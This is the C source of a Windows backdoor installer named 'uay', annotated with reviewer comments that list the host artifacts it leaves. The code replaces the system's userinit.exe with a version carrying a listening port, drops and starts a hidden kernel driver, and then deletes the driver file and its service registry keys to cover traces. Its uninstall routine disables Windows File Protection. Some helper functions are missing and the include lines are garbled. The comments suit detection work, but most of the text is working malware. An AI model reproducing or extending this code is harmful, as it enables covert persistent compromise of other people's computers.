// mAin.c (uay_source.rar): command-line installer/uninstaller for "uay".
//
// What the visible code does on install: copies the system directory's
// userinit.exe to u_uay_woAini.exe, calls helpers (declared here, defined
// elsewhere) that build a replacement userinit.exe carrying a port number,
// then writes uay.sys from an embedded resource, registers and starts it as a
// demand-start kernel-driver service named "uay.sys", and finally deletes the
// driver file and the service's registry keys.
//
// Host artifacts named in this file (all paths are under GetSystemDirectory();
// compare file names case-insensitively):
//   u_uay_woAini.exe             copy of the original userinit.exe
//   temp_u_userinit_before.exe   temporary, deleted by InstAll
//   temp_u_userinit_After.exe    temporary, deleted by InstAll
//   uay.sys                      driver file, deleted by InstAll after the start attempt
//   HKLM\SYSTEM\CurrentControlSet\Services\uay.sys  (plus \Enum and \Security)
//   0xAABBCCDD                   marker read at file offset 90 of userinit.exe
//   9929                         default port (the usage text calls it the port to listen on)

// NOTE(review): the three header names appear to have been lost when the page
// was extracted; only the bare directives remain.
#include#include #include

// Record read from userinit.exe by AlreAdyInstAlled(): a marker value followed
// by a port number. Presumably written by CombineWithUserinit() - not shown here.
typedef struct _SIGNANDPORT{
    unsigned int sign;
    unsigned int port;
}SIGNANDPORT,*PSIGNANDPORT;

// Prototypes. ReleAseTheExe, CombineWithUserinit, ReplAceUserinit, DisAbleWFP,
// FindProcess, GetHandleList, CompAreStringBAckwArds and RAisePrivilege are only
// declared in this listing; their bodies are not on this page.
void BAckUpOriginUserinit(void);
int ReleAseTheExe(
    char* towhere //this argument is also passed as the first argument of CombineWithUserinit
    );
int CombineWithUserinit(
    char* who,///like "C:\\WINDOWS\\System32\\bd_sys.exe" - path of the released (dropped) file
    char* wheretoreleAse,//location of the generated userinit.exe; the name is not fixed
    int port
    );
int ReplAceUserinit(
    char* withwhom //the second argument of CombineWithUserinit
                   //the function is not responsible for deleting withwhom
    );
int DeleteSysKey(void);
int ReleAseTheSys(void);
int LoAdSys(void);
void InstAll(int port);
BOOL AlreAdyInstAlled(void);
void UsAge(void);
void UnInstAll(void);
BOOL DisAbleWFP( void );
DWORD FindProcess( char* pProcessNAme );
PULONG GetHandleList( void );
BOOL CompAreStringBAckwArds( WCHAR *Str1, WCHAR *Str2 );
BOOL DisAbleWFP( void ); // duplicate of the declaration above
int RAisePrivilege( void );
//--------------------------------------------------------------------
// Entry point: dispatches on the single optional argument.
//   no argument        -> install with port 9929 unless the marker is already present
//   /? -h --help help  -> print usage
//   -u                 -> uninstall
//   number 1..32767    -> install with that port unless already installed
// Every path returns 0, so the exit code does not tell success from failure.
int main(int Argc,char* Argv[])
{
    if(Argc >=3){
        printf("too mAny Arguments\n");
        UsAge();
        return 0;
    }
    if(Argc == 1){ //no argument: use port 9929
        if(!AlreAdyInstAlled()){
            InstAll(9929);
            return 0;
        }
        else{
            printf("AlreAdy instAlled,you should uninstAll it first.\n");
            //UsAge();
            return 0;
        }
    }
    else{
        if ( 0 == stricmp(Argv[1],"/?") || 0 == stricmp(Argv[1],"-h") || 0 == stricmp(Argv[1],"--help") || 0 == stricmp(Argv[1],"help") ) {
            UsAge();
            return 0;
        }
        if(0 == stricmp(Argv[1],"-u")){
            UnInstAll();
            return 0;
        }
        else{
            // Anything else is treated as a port number.
            if(atoi(Argv[1]) > 0 && atoi(Argv[1]) < 32768){
                if(!AlreAdyInstAlled()){
                    InstAll(atoi(Argv[1]));
                    return 0;
                }
                else{
                    printf("AlreAdy instAlled,you should uninstAll it first.\n");
                    //UsAge();
                    return 0;
                }
            }
            else{
                printf("wrong port number\n");
                //UsAge();
                return 0;
            }
        }
    }
    return 0;
}
//--------------------------------------------------------------------
// Copies <system dir>\userinit.exe to <system dir>\u_uay_woAini.exe,
// overwriting an existing copy (bFailIfExists is FALSE). The copy is what
// UnInstAll() later restores from; its presence is a host indicator.
void BAckUpOriginUserinit(void)
{
    char pAth_userinit[MAX_PATH+1];
    char pAth_bAckupfile[MAX_PATH+1];
    GetSystemDirectory(pAth_userinit,MAX_PATH);
    GetSystemDirectory(pAth_bAckupfile,MAX_PATH);
    strcat(pAth_userinit,"\\userinit.exe");
    strcat(pAth_bAckupfile,"\\u_uay_woAini.exe");
    CopyFile(pAth_userinit,pAth_bAckupfile,FALSE);
}
//--------------------------------------------------------------------
// Writes the resource named "uay" of type "sys" from this executable to
// <system dir>\uay.sys. Returns 0 on success and -1 as soon as any step
// reports failure.
int ReleAseTheSys(void)
{
    HRSRC hRes = NULL;
    DWORD dwResSize = 0;
    HGLOBAL hResource = NULL;
    LPVOID lpfResource = NULL;
    HANDLE hFile = NULL;
    char SystemDir[128];//i think it's enough
    DWORD dwWritten;
    DWORD result;
    // Locate the embedded resource in the running module (NULL module handle).
    hRes = FindResource(NULL,"uay","sys");
    if (hRes == NULL) {
        return -1;
    }
    dwResSize = SizeofResource(NULL,hRes);
    if (dwResSize == 0) {
        return -1;
    }
    hResource = LoadResource(NULL,hRes);
    if (hResource == NULL){
        return -1;
    }
    lpfResource = LockResource(hResource);
    if (lpfResource == NULL) {
        return -1;
    }
    // Drop location: the system directory, file name uay.sys.
    GetSystemDirectory(SystemDir,128);
    strcat(SystemDir,"\\uay.sys");
    hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
    if (hFile == NULL){
        return -1;
    }
    result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);
    if (result == 0){
        return -1;
    }
    CloseHandle(hFile);
    return 0;
}
//--------------------------------------------------------------------
// Registers <system dir>\uay.sys as a kernel-driver service named "uay.sys"
// (SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START) and asks the service control
// manager to start it. Failures are only printed or ignored; the function
// always returns 0. Creating a kernel-driver service from a user-mode
// installer is the step that service-installation auditing records.
int LoAdSys(void)
{
    //create the service and load the driver
    SC_HANDLE hSCHAndle;
    SC_HANDLE hSCMAnAger;
    char systemdir[MAX_PATH+1];
    char pAth[MAX_PATH+1];
    GetSystemDirectory(systemdir,MAX_PATH);
    sprintf(pAth,"%s\\%s",systemdir,"uay.sys");
    hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
    //remove old instAnces
    hSCHAndle = OpenService(hSCMAnAger, "uay.sys", SERVICE_ALL_ACCESS );
    if (hSCHAndle == NULL){
        //throw
        //return -1;
    }
    DeleteService(hSCHAndle);
    CloseServiceHandle(hSCHAndle);
    //ignore success of instAllAtion:it mAy AlreAdy be instAlled
    hSCHAndle = CreateService(
        hSCMAnAger,
        "uay.sys",
        "uay.sys",
        SERVICE_ALL_ACCESS,
        SERVICE_KERNEL_DRIVER,
        SERVICE_DEMAND_START,
        SERVICE_ERROR_NORMAL,
        pAth,
        NULL,
        NULL,
        NULL,
        NULL,
        NULL
        );
    if (hSCHAndle == NULL){
        printf("CreAteService error: %d\n",GetLastError());
        //return -1;
    }
    CloseServiceHandle(hSCHAndle);
    //ignore success of stArt: it mAy ALreAdy be stAarted
    hSCHAndle = OpenService(hSCMAnAger, "uay.sys", SERVICE_ALL_ACCESS );
    if (hSCHAndle == NULL){
        printf("OpenService error: %d\n",GetLastError());
        //return -1;
    }
    StartService(hSCHAndle,0,NULL);
    //printf("stArtService %d\n",GetLastError());
    CloseServiceHandle(hSCHAndle);
    CloseServiceHandle(hSCMAnAger);
    return 0;
}
//--------------------------------------------------------------------
// Deletes the service's registry keys directly with RegDeleteKey: the \Enum
// and \Security subkeys first, then the Services\uay.sys key itself. Results
// are ignored and 0 is always returned.
int DeleteSysKey(void)
{
    RegDeleteKey(
        HKEY_LOCAL_MACHINE,
        "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum"
        );
    //printf("RegDeleteKey: %d\n",GetLastError());
    RegDeleteKey(
        HKEY_LOCAL_MACHINE,
        "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
        );
    //printf("RegDeleteKey: %d\n",GetLastError());
    RegDeleteKey(
        HKEY_LOCAL_MACHINE,
        "SYSTEM\\CurrentControlSet\\Services\\uay.sys"
        );
    //printf("RegDeleteKey: %d\n",GetLastError());
    return 0;
}
//--------------------------------------------------------------------
// Full install sequence for the given port. No return value of any step is
// checked, so an interrupted or partly failed run can leave any subset of the
// artifacts below behind (backup copy, temp files, driver file, service key).
void InstAll(int port)
{
    char syspAth[MAX_PATH+1];
    char tempfile_before_combine[MAX_PATH+1];
    char tempfile_After_combine[MAX_PATH+1];
    GetSystemDirectory(tempfile_before_combine,MAX_PATH);
    strcat(tempfile_before_combine,"\\temp_u_userinit_before.exe");
    GetSystemDirectory(tempfile_After_combine,MAX_PATH);
    strcat(tempfile_After_combine,"\\temp_u_userinit_After.exe");
    //back up userinit.exe somewhere inconspicuous; this copy can be used to restore it :>
    BAckUpOriginUserinit();
    // The three helpers below are not defined on this page; their roles are
    // taken from the prototype comments above.
    ReleAseTheExe(tempfile_before_combine);
    CombineWithUserinit(
        tempfile_before_combine,
        tempfile_After_combine,
        port
        );
    //delete the temp file from before the combine step
    DeleteFile(tempfile_before_combine);
    ReplAceUserinit(tempfile_After_combine);
    //delete the temp file from after the combine step; userinit.exe is now ours, no extra files remain :>
    DeleteFile(tempfile_After_combine);
    //for the first run
    //driver part
    ReleAseTheSys();
    LoAdSys();
    //delete the sys,reg.
    // The driver file and its Services key are removed right after the start
    // attempt. Presumably the driver stays loaded until reboot, in which case
    // a file or registry sweep will not show it; service-installation and
    // driver-load records, or memory, are where the evidence remains.
    GetSystemDirectory(syspAth,MAX_PATH);
    strcat(syspAth,"\\uay.sys");
    DeleteFile(syspAth);
    //printf("DeleteFile: %d\n",GetLastError());
    DeleteSysKey();
}
//--------------------------------------------------------------------
// Reads sizeof(SIGNANDPORT) bytes at file offset 90 of <system dir>\userinit.exe
// and returns TRUE when the first field equals 0xAABBCCDD. The same offset and
// value can serve as a check for a modified userinit.exe. Exits the process
// with -1 if fseek fails.
BOOL AlreAdyInstAlled(void)
{
    FILE* pFile;
    char pAth[MAX_PATH];
    SIGNANDPORT SignAndPort;
    GetSystemDirectory(pAth,MAX_PATH);
    strcat(pAth,"\\userinit.exe");
    pFile = fopen(pAth,"rb");
    if(0 != fseek(pFile,90,SEEK_SET)){
        printf("some error occur when cAll to fseek,exit instAll\n");
        exit(-1);
    }
    fread(&SignAndPort,1,sizeof(SIGNANDPORT),pFile);
    fclose(pFile);
    if(SignAndPort.sign == 0xAABBCCDD){
        return TRUE;
    }
    return FALSE;
}
//--------------------------------------------------------------------
// Prints the command-line help: the tool's name (uay.exe), the author string,
// the accepted arguments and the default port.
void UsAge(void)
{
    printf(
        "\n"
        " uay.exe\n"// to qinqin,my truelove And soul mate\n"
        " writen by uty@uaty\n\n"
        "usAge:\n"
        " uay.exe port specify the port to listen. eg: uay.exe 12345\n"
        " uay.exe -u uninstAll\n"
        " uay.exe -h displAy this\n"
        "note:\n"
        " defAult port is 9929,And do not chose A port AlreAdy been using\n"
        );
}
//--------------------------------------------------------------------
// Restores userinit.exe from the u_uay_woAini.exe backup, but only when the
// install marker is present and DisAbleWFP() reports success (WFP is
// presumably Windows File Protection; the helper is not shown here). Both the
// dllcache copy and the live copy are overwritten. The backup file itself is
// not deleted, so it can remain on a host after an uninstall.
void UnInstAll(void)
{
    char pAth_bAckup[MAX_PATH+1];
    char userinit_system32[MAX_PATH+1];
    char userinit_system32_dllcAche[MAX_PATH+1];
    if(AlreAdyInstAlled()){
        GetSystemDirectory(userinit_system32,MAX_PATH);
        GetSystemDirectory(userinit_system32_dllcAche,MAX_PATH);
        strcat(userinit_system32,"\\userinit.exe");
        strcat(userinit_system32_dllcAche,"\\dllcache\\userinit.exe");
        GetSystemDirectory(pAth_bAckup,MAX_PATH);
        strcat(pAth_bAckup,"\\u_uay_woAini.exe");
        RAisePrivilege();
        if(DisAbleWFP()){
            // dllcache copy first, then the live file.
            DeleteFile(userinit_system32_dllcAche);
            CopyFile(
                pAth_bAckup,
                userinit_system32_dllcAche,
                FALSE
                );
            DeleteFile(userinit_system32);
            CopyFile(
                pAth_bAckup,
                userinit_system32,
                FALSE
                );
            printf("replAce done.\n");
        }
        else{
            printf("didn't disAble WFP\n");
        }
    }
    else{
        printf("instAll first\n");
    }
}
//--------------------------------------------------------------------